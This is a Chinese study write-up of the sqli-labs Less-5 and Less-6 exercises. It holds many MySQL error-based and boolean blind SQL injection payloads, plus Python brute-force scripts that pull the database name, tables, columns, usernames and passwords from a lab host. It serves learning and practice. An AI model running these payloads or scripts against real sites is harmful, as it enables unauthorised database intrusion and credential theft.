之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
Sqli-labs 博客目录
盲注用到的函数
rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列
rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列
floor 向下取整 floor(2.5) == 2
count()统计元组的个数
concat 字符串连接
extractvalue(最长32位)
updateXml(最长32位)
Less-5 使用脚本爆破注入
Less-6 使用 floor(rand(x)*2) 报错注入
下面以 Less-6(基于报错的sql盲注-双引号)为例进行列举)
布尔型盲注手法,按位爆破
?id=1’and left((select version() limit 0,1),1)=‘s’#
利用 floor(rand(x)*2) 的执行bug进行报错注入
?id=1" union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#
?id=1" and extractvalue(1,concat(0x7e,(database())))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#
利用 updatexml() 函数报错注入(有长度限制,最长32位)
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用 )
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
利用 double 数值类型超出范围进行报错注入
?id=1" union select (exp(~(select * from(select user())a))),2,3#
未测试成功
利用 bigint 溢出进行报错注入(这些溢出错误会导致MySQL版本5.5.5及以上)
基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)
未测试成功
?id=1" union select (!(select * from (select user())x) - ~0),2,3#
下面为句式:
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
select ~0+!(select*from(select user())x)
一个句式组合:
(select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)
遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" union select (exp(~(select * from(select user())a))),2,3#
and so on...
测试
?id=1 正常
?id=1" 正常
?id=1' 报错
下面使用布尔的 SQL 盲注
猜数据库的版本
?id=1'and left(version(),1)=4--+
?id=1'and left(version(),1)=5--+
# 结果为 5.0.51a3ubuntu5
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-1 database_version.py
import hackhttp
import re
def database_version(arg):
print "database_version start test..."
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
version=""
for i in range(1,20):
for j in payloads:
hh = hackhttp.hackhttp()
msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i,j=j)
code, head, body, redirect_url, log = hh.http(arg+msg)
count = re.findall("You are in",body)
if 'You are in' in count:
version+=j
print "第%s位是%s" % (i,j)
break
print "数据库的版本为: {version}".format(version=version)
if __name__ == '__main__':
database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜数据库的长度
?id=1'and length(database())=7--+
?id=1'and length(database())=8--+
# 结果为 8
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-2 database_length.py
import hackhttp
import re
def database_length(arg):
print "database_length start test..."
length=""
for j in range(1,20):
hh = hackhttp.hackhttp()
msg = "1%27and%20length(database())={j}--+".format(j=j)
code, head, body, redirect_url, log = hh.http(arg+msg)
count = re.findall("You are in",body)
if 'You are in' in count:
length=j
break
print "数据库的长度为: {length}".format(length=length)
if __name__ == '__main__':
database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜数据库名
?id=1' and mid(database(),1,1)="a"--+
?id=1' and mid(database(),1,1)="b"--+
# 结果为 security
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-3 database_name.py
import hackhttp
import re
def database_name(arg):
print "database_name start test..."
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
name=""
for i in range(1,20):
for j in payloads:
hh = hackhttp.hackhttp()
msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j)
code, head, body, redirect_url, log = hh.http(arg+msg)
count = re.findall("You are in",body)
if 'You are in' in count:
name+=j
print "第%s位是%s" % (i,j)
break
print "数据库的版本为: {name}".format(name=name)
if __name__ == '__main__':
database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜表名
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80–+
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81–+
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80–+
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80–+
结果为 emails, ussers
运行脚本
# -*- coding: utf-8 -*-
# filename:Less05-4 table_name.py
import hackhttp
import re
def table_name(arg):
print "table_name start test..."
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
table_name=""
database_name=""
for k in range(10):
for i in range(1,10):
for j in range(65,122):
hh = hackhttp.hackhttp()
msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
code, head, body, redirect_url, log = hh.http(arg+msg)
count = re.findall("You are in",body)
if 'You are in' in count:
table_name+=chr(j)
#database_name+=str(k+1)
print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
break
table_name+=" "
print "security 数据库的表名为: {table_name}".format(table_name=table_name)
if __name__ == '__main__':
table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜列名
?id=1’and 1=(select 1 from information_schema.columns where table_name=‘users’ and column_name regexp ‘^pass’ limit 0,1)–+
?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65–+
?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65–+
结果为 id username password
执行脚本
# -*- coding: utf-8 -*-
# filename:Less05-5 column_name.py
import hackhttp
import re
def column_name(arg):
print "column_name start test..."
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
column_name=""
for k in range(10):
for i in range(1,15):
for j in range(65,122):
hh = hackhttp.hackhttp()
msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
code, head, body, redirect_url, log = hh.http(arg+msg)
count = re.findall("You are in",body)
if 'You are in' in count:
column_name+=chr(j)
print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
break
column_name+=" "
print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)
if __name__ == '__main__':
column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜数据
?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68–+
?id=1’and ascii(substr((select username from security.users limit 0,1),1,1))=68–+
执行脚本
# -*- coding: utf-8 -*-
# filename:Less05-5 data.py
import hackhttp
import re
def data(arg):
print "data start test..."
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
username=""
password=""
for k in range(14):
for i in range(1,15):
for j in range(48,122):
hh = hackhttp.hackhttp()
username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
code, head, body, redirect_url, log = hh.http(arg+username_msg)
code, head, body, redirect_url, log = hh.http(arg+password_msg)
username_count = re.findall("You are in",body)
password_count = re.findall("You are in",body)
if 'You are in' in username_count:
username+=chr(j)
print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
if 'You are in' in password_count:
password+=chr(j)
print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
break
username+=" "
password+=" "
print "security 数据库的 user 表的username为: {username}".format(username=username)
print "security 数据库的 user 表的password为: {password}".format(password=password)
if __name__ == '__main__':
data('http://10.10.10.137/sqli-labs/Less-5/?id=')
floor(rand(x)*2) - SQL报错型盲注教程(原理全剖析( https://blog.csdn.net/qq_35544379/article/details/77453019 ))
牛人推论:对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010“或”1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注
测试
?id=1 正常
?id=1' 正常
?id=1" 报错
下面使用基于报错的 SQL 盲注
公式:
?id=1’ union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a–+
例如:
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+
?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a–+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+
有的时候 union 联合查询无法使用,则可以使用 and
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
猜数据库
?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+
查表的个数
?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a–+
查表名
?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
查列数
?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
列名
?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
?id=1" union Select 1,count(*),concat((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
查数据
?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security. users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+